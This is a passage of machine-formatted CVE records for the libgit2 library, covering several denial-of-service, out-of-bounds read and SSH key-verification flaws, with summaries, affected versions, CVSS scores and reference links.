url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { name: "http://securitytracker.com/id?1031404", refsource: "MISC", url: "http://securitytracker.com/id?1031404", }, { name: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", refsource: "MISC", url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { name: "https://libgit2.org/security/", refsource: "MISC", url: "https://libgit2.org/security/", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2014-9390", datePublished: "2020-02-12T01:58:27", dateReserved: "2014-12-17T00:00:00", dateUpdated: "2024-08-06T13:40:25.038Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-15501
Vulnerability from cvelistv5
Published
2018-08-18 02:00
Modified
2024-08-05 09:54
Severity ?
EPSS score ?
Summary
In ng_pkt in transports/smart_pkt.c in libgit2 before 0.26.6 and 0.27.x before 0.27.4, a remote attacker can send a crafted smart-protocol "ng" packet that lacks a '\0' byte to trigger an out-of-bounds read that leads to DoS.
References
| ▼ | URL | Tags |
|---|---|---|
| https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=9406 | x_refsource_MISC | |
| https://github.com/libgit2/libgit2/releases/tag/v0.27.4 | x_refsource_MISC | |
| https://www.pro-linux.de/sicherheit/2/44650/denial-of-service-in-libgit2.html | x_refsource_MISC | |
| https://bugzilla.suse.com/show_bug.cgi?id=1104641 | x_refsource_MISC | |
| https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html | mailing-list, x_refsource_MLIST | |
| https://github.com/libgit2/libgit2/releases/tag/v0.26.6 | x_refsource_MISC | |
| https://github.com/libgit2/libgit2/commit/1f9a8510e1d2f20ed7334eeeddb92c4dd8e7c649 | x_refsource_MISC | |
| https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html | mailing-list, x_refsource_MLIST |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T09:54:03.514Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=9406", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.4", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.pro-linux.de/sicherheit/2/44650/denial-of-service-in-libgit2.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://bugzilla.suse.com/show_bug.cgi?id=1104641", }, { name: "[debian-lts-announce] 20180825 [SECURITY] [DLA 1477-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.26.6", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/1f9a8510e1d2f20ed7334eeeddb92c4dd8e7c649", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-08-17T00:00:00", descriptions: [ { lang: "en", value: "In ng_pkt in transports/smart_pkt.c in libgit2 before 0.26.6 and 0.27.x before 0.27.4, a remote attacker can send a crafted smart-protocol \"ng\" packet that lacks a '\\0' byte to trigger an out-of-bounds read that leads to DoS.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2022-03-21T02:06:14", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_MISC", ], url: "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=9406", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.4", }, { tags: [ "x_refsource_MISC", ], url: "https://www.pro-linux.de/sicherheit/2/44650/denial-of-service-in-libgit2.html", }, { tags: [ "x_refsource_MISC", ], url: "https://bugzilla.suse.com/show_bug.cgi?id=1104641", }, { name: "[debian-lts-announce] 20180825 [SECURITY] [DLA 1477-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.26.6", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/commit/1f9a8510e1d2f20ed7334eeeddb92c4dd8e7c649", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2018-15501", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "In ng_pkt in transports/smart_pkt.c in libgit2 before 0.26.6 and 0.27.x before 0.27.4, a remote attacker can send a crafted smart-protocol \"ng\" packet that lacks a '\\0' byte to trigger an out-of-bounds read that leads to DoS.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=9406", refsource: "MISC", url: "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=9406", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v0.27.4", refsource: "MISC", url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.4", }, { name: "https://www.pro-linux.de/sicherheit/2/44650/denial-of-service-in-libgit2.html", refsource: "MISC", url: "https://www.pro-linux.de/sicherheit/2/44650/denial-of-service-in-libgit2.html", }, { name: "https://bugzilla.suse.com/show_bug.cgi?id=1104641", refsource: "MISC", url: "https://bugzilla.suse.com/show_bug.cgi?id=1104641", }, { name: "[debian-lts-announce] 20180825 [SECURITY] [DLA 1477-1] libgit2 security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v0.26.6", refsource: "MISC", url: "https://github.com/libgit2/libgit2/releases/tag/v0.26.6", }, { name: "https://github.com/libgit2/libgit2/commit/1f9a8510e1d2f20ed7334eeeddb92c4dd8e7c649", refsource: "MISC", url: "https://github.com/libgit2/libgit2/commit/1f9a8510e1d2f20ed7334eeeddb92c4dd8e7c649", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2018-15501", datePublished: "2018-08-18T02:00:00", dateReserved: "2018-08-17T00:00:00", dateUpdated: "2024-08-05T09:54:03.514Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2023-22742
Vulnerability from cvelistv5
Published
2023-01-20 22:49
Modified
2025-03-10 21:21
Severity ?
EPSS score ?
Summary
libgit2 is a cross-platform, linkable library implementation of Git. When using an SSH remote with the optional libssh2 backend, libgit2 does not perform certificate checking by default. Prior versions of libgit2 require the caller to set the `certificate_check` field of libgit2's `git_remote_callbacks` structure - if a certificate check callback is not set, libgit2 does not perform any certificate checking. This means that by default - without configuring a certificate check callback, clients will not perform validation on the server SSH keys and may be subject to a man-in-the-middle attack. Users are encouraged to upgrade to v1.4.5 or v1.5.1. Users unable to upgrade should ensure that all relevant certificates are manually checked.
References
| ▼ | URL | Tags |
|---|---|---|
| https://github.com/libgit2/libgit2/security/advisories/GHSA-8643-3wh5-rmjq | x_refsource_CONFIRM | |
| https://github.com/libgit2/libgit2/commit/42e5db98b963ae503229c63e44e06e439df50e56 | x_refsource_MISC | |
| https://github.com/libgit2/libgit2/commit/cd6f679af401eda1f172402006ef8265f8bd58ea | x_refsource_MISC | |
| https://github.com/libgit2/libgit2/releases/tag/v1.4.5 | x_refsource_MISC | |
| https://github.com/libgit2/libgit2/releases/tag/v1.5.1 | x_refsource_MISC | |
| https://www.libssh2.org | x_refsource_MISC | |
| http://www.openwall.com/lists/oss-security/2023/11/06/5 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-02T10:20:30.067Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "https://github.com/libgit2/libgit2/security/advisories/GHSA-8643-3wh5-rmjq", tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-8643-3wh5-rmjq", }, { name: "https://github.com/libgit2/libgit2/commit/42e5db98b963ae503229c63e44e06e439df50e56", tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/42e5db98b963ae503229c63e44e06e439df50e56", }, { name: "https://github.com/libgit2/libgit2/commit/cd6f679af401eda1f172402006ef8265f8bd58ea", tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/cd6f679af401eda1f172402006ef8265f8bd58ea", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.4.5", tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.4.5", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.5.1", tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.5.1", }, { name: "https://www.libssh2.org", tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.libssh2.org", }, { tags: [ "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2023/11/06/5", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2023-22742", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2025-03-10T20:59:36.699887Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2025-03-10T21:21:08.962Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "libgit2", vendor: "libgit2", versions: [ { status: "affected", version: "< 1.4.5", }, { status: "affected", version: "= 1.5.0", }, ], }, ], descriptions: [ { lang: "en", value: "libgit2 is a cross-platform, linkable library implementation of Git. When using an SSH remote with the optional libssh2 backend, libgit2 does not perform certificate checking by default. Prior versions of libgit2 require the caller to set the `certificate_check` field of libgit2's `git_remote_callbacks` structure - if a certificate check callback is not set, libgit2 does not perform any certificate checking. This means that by default - without configuring a certificate check callback, clients will not perform validation on the server SSH keys and may be subject to a man-in-the-middle attack. Users are encouraged to upgrade to v1.4.5 or v1.5.1. Users unable to upgrade should ensure that all relevant certificates are manually checked.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", version: "3.1", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-347", description: "CWE-347: Improper Verification of Cryptographic Signature", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2023-11-07T00:06:32.714Z", orgId: "a0819718-46f1-4df5-94e2-005712e83aaa", shortName: "GitHub_M", }, references: [ { name: "https://github.com/libgit2/libgit2/security/advisories/GHSA-8643-3wh5-rmjq", tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-8643-3wh5-rmjq", }, { name: "https://github.com/libgit2/libgit2/commit/42e5db98b963ae503229c63e44e06e439df50e56", tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/commit/42e5db98b963ae503229c63e44e06e439df50e56", }, { name: "https://github.com/libgit2/libgit2/commit/cd6f679af401eda1f172402006ef8265f8bd58ea", tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/commit/cd6f679af401eda1f172402006ef8265f8bd58ea", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.4.5", tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.4.5", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.5.1", tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.5.1", }, { name: "https://www.libssh2.org", tags: [ "x_refsource_MISC", ], url: "https://www.libssh2.org", }, { url: "http://www.openwall.com/lists/oss-security/2023/11/06/5", }, ], source: { advisory: "GHSA-8643-3wh5-rmjq", discovery: "UNKNOWN", }, title: "libgit2 fails to verify SSH keys by default", }, }, cveMetadata: { assignerOrgId: "a0819718-46f1-4df5-94e2-005712e83aaa", assignerShortName: "GitHub_M", cveId: "CVE-2023-22742", datePublished: "2023-01-20T22:49:06.378Z", dateReserved: "2023-01-06T14:21:05.892Z", dateUpdated: "2025-03-10T21:21:08.962Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-10887
Vulnerability from cvelistv5
Published
2018-07-10 14:00
Modified
2024-09-17 01:06
Severity ?
EPSS score ?
Summary
A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. An attacker may use this flaw to leak memory addresses or cause a Denial of Service.
References
| ▼ | URL | Tags |
|---|---|---|
| https://bugzilla.redhat.com/show_bug.cgi?id=1598021 | x_refsource_CONFIRM | |
| https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html | mailing-list, x_refsource_MLIST | |
| https://github.com/libgit2/libgit2/releases/tag/v0.27.3 | x_refsource_CONFIRM | |
| https://github.com/libgit2/libgit2/commit/c1577110467b701dcbcf9439ac225ea851b47d22 | x_refsource_CONFIRM | |
| https://github.com/libgit2/libgit2/commit/3f461902dc1072acb8b7607ee65d0a0458ffac2a | x_refsource_CONFIRM | |
| https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html | mailing-list, x_refsource_MLIST |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T07:54:34.874Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1598021", }, { name: "[debian-lts-announce] 20180825 [SECURITY] [DLA 1477-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/c1577110467b701dcbcf9439ac225ea851b47d22", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/3f461902dc1072acb8b7607ee65d0a0458ffac2a", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "libgit2", vendor: "libgit2", versions: [ { status: "affected", version: "before version 0.27.3", }, ], }, ], datePublic: "2018-07-09T00:00:00", descriptions: [ { lang: "en", value: "A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. An attacker may use this flaw to leak memory addresses or cause a Denial of Service.", }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-194", description: "CWE-194->CWE-190->CWE-125", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-03-21T02:06:10", orgId: "53f830b8-0a3f-465b-8143-3b8a9948e749", shortName: "redhat", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1598021", }, { name: "[debian-lts-announce] 20180825 [SECURITY] [DLA 1477-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/libgit2/libgit2/commit/c1577110467b701dcbcf9439ac225ea851b47d22", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/libgit2/libgit2/commit/3f461902dc1072acb8b7607ee65d0a0458ffac2a", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert@redhat.com", DATE_PUBLIC: "2018-07-09T00:00:00", ID: "CVE-2018-10887", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "libgit2", version: { version_data: [ { version_value: "before version 0.27.3", }, ], }, }, ], }, vendor_name: "libgit2", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. An attacker may use this flaw to leak memory addresses or cause a Denial of Service.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-194->CWE-190->CWE-125", }, ], }, ], }, references: { reference_data: [ { name: "https://bugzilla.redhat.com/show_bug.cgi?id=1598021", refsource: "CONFIRM", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1598021", }, { name: "[debian-lts-announce] 20180825 [SECURITY] [DLA 1477-1] libgit2 security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", refsource: "CONFIRM", url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", }, { name: "https://github.com/libgit2/libgit2/commit/c1577110467b701dcbcf9439ac225ea851b47d22", refsource: "CONFIRM", url: "https://github.com/libgit2/libgit2/commit/c1577110467b701dcbcf9439ac225ea851b47d22", }, { name: "https://github.com/libgit2/libgit2/commit/3f461902dc1072acb8b7607ee65d0a0458ffac2a", refsource: "CONFIRM", url: "https://github.com/libgit2/libgit2/commit/3f461902dc1072acb8b7607ee65d0a0458ffac2a", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "53f830b8-0a3f-465b-8143-3b8a9948e749", assignerShortName: "redhat", cveId: "CVE-2018-10887", datePublished: "2018-07-10T14:00:00Z", dateReserved: "2018-05-09T00:00:00", dateUpdated: "2024-09-17T01:06:07.091Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-24575
Vulnerability from cvelistv5
Published
2024-02-06 21:27
Modified
2025-02-13 17:40
Severity ?
EPSS score ?
Summary
libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_revparse_single` can cause the function to enter an infinite loop, potentially causing a Denial of Service attack in the calling application. The revparse function in `src/libgit2/revparse.c` uses a loop to parse the user-provided spec string. There is an edge-case during parsing that allows a bad actor to force the loop conditions to access arbitrary memory. Potentially, this could also leak memory if the extracted rev spec is reflected back to the attacker. As such, libgit2 versions before 1.4.0 are not affected. Users should upgrade to version 1.6.5 or 1.7.2.
References
Impacted products
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-24575", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-02-21T18:43:05.693788Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-07-05T17:21:51.653Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T23:19:52.905Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "https://github.com/libgit2/libgit2/security/advisories/GHSA-54mf-x2rh-hq9v", tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-54mf-x2rh-hq9v", }, { name: "https://github.com/libgit2/libgit2/commit/add2dabb3c16aa49b33904dcdc07cd915efc12fa", tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/add2dabb3c16aa49b33904dcdc07cd915efc12fa", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", }, { tags: [ "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/", }, { tags: [ "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/", }, { tags: [ "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/", }, { tags: [ "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/", }, { tags: [ "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "libgit2", vendor: "libgit2", versions: [ { status: "affected", version: ">= 1.4.0, < 1.6.5", }, { status: "affected", version: ">= 1.7.0, < 1.7.2", }, ], }, ], descriptions: [ { lang: "en", value: "libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_revparse_single` can cause the function to enter an infinite loop, potentially causing a Denial of Service attack in the calling application. The revparse function in `src/libgit2/revparse.c` uses a loop to parse the user-provided spec string. There is an edge-case during parsing that allows a bad actor to force the loop conditions to access arbitrary memory. Potentially, this could also leak memory if the extracted rev spec is reflected back to the attacker. As such, libgit2 versions before 1.4.0 are not affected. Users should upgrade to version 1.6.5 or 1.7.2.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-400", description: "CWE-400: Uncontrolled Resource Consumption", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-22T04:06:00.858Z", orgId: "a0819718-46f1-4df5-94e2-005712e83aaa", shortName: "GitHub_M", }, references: [ { name: "https://github.com/libgit2/libgit2/security/advisories/GHSA-54mf-x2rh-hq9v", tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-54mf-x2rh-hq9v", }, { name: "https://github.com/libgit2/libgit2/commit/add2dabb3c16aa49b33904dcdc07cd915efc12fa", tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/commit/add2dabb3c16aa49b33904dcdc07cd915efc12fa", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", }, { url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/", }, { url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/", }, { url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/", }, { url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/", }, { url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/", }, ], source: { advisory: "GHSA-54mf-x2rh-hq9v", discovery: "UNKNOWN", }, title: "libgit2 is vulnerable to a denial of service attack in `git_revparse_single`", }, }, cveMetadata: { assignerOrgId: "a0819718-46f1-4df5-94e2-005712e83aaa", assignerShortName: "GitHub_M", cveId: "CVE-2024-24575", datePublished: "2024-02-06T21:27:57.328Z", dateReserved: "2024-01-25T15:09:40.211Z", dateUpdated: "2025-02-13T17:40:13.105Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-8098
Vulnerability from cvelistv5
Published
2018-03-14 00:00
Modified
2024-08-05 06:46
Severity ?
EPSS score ?
Summary
Integer overflow in the index.c:read_entry() function while decompressing a compressed prefix length in libgit2 before v0.26.2 allows an attacker to cause a denial of service (out-of-bounds read) via a crafted repository index file.
References
| ▼ | URL | Tags |
|---|---|---|
| https://github.com/libgit2/libgit2/commit/3207ddb0103543da8ad2139ec6539f590f9900c1 | x_refsource_CONFIRM | |
| https://libgit2.github.com/security/ | x_refsource_CONFIRM | |
| https://github.com/libgit2/libgit2/commit/3db1af1f370295ad5355b8f64b865a2a357bcac0 | x_refsource_CONFIRM | |
| https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html | mailing-list, x_refsource_MLIST |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T06:46:13.414Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/3207ddb0103543da8ad2139ec6539f590f9900c1", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://libgit2.github.com/security/", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/3db1af1f370295ad5355b8f64b865a2a357bcac0", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-03-13T00:00:00", descriptions: [ { lang: "en", value: "Integer overflow in the index.c:read_entry() function while decompressing a compressed prefix length in libgit2 before v0.26.2 allows an attacker to cause a denial of service (out-of-bounds read) via a crafted repository index file.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2022-03-21T02:06:13", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/libgit2/libgit2/commit/3207ddb0103543da8ad2139ec6539f590f9900c1", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://libgit2.github.com/security/", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/libgit2/libgit2/commit/3db1af1f370295ad5355b8f64b865a2a357bcac0", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2018-8098", 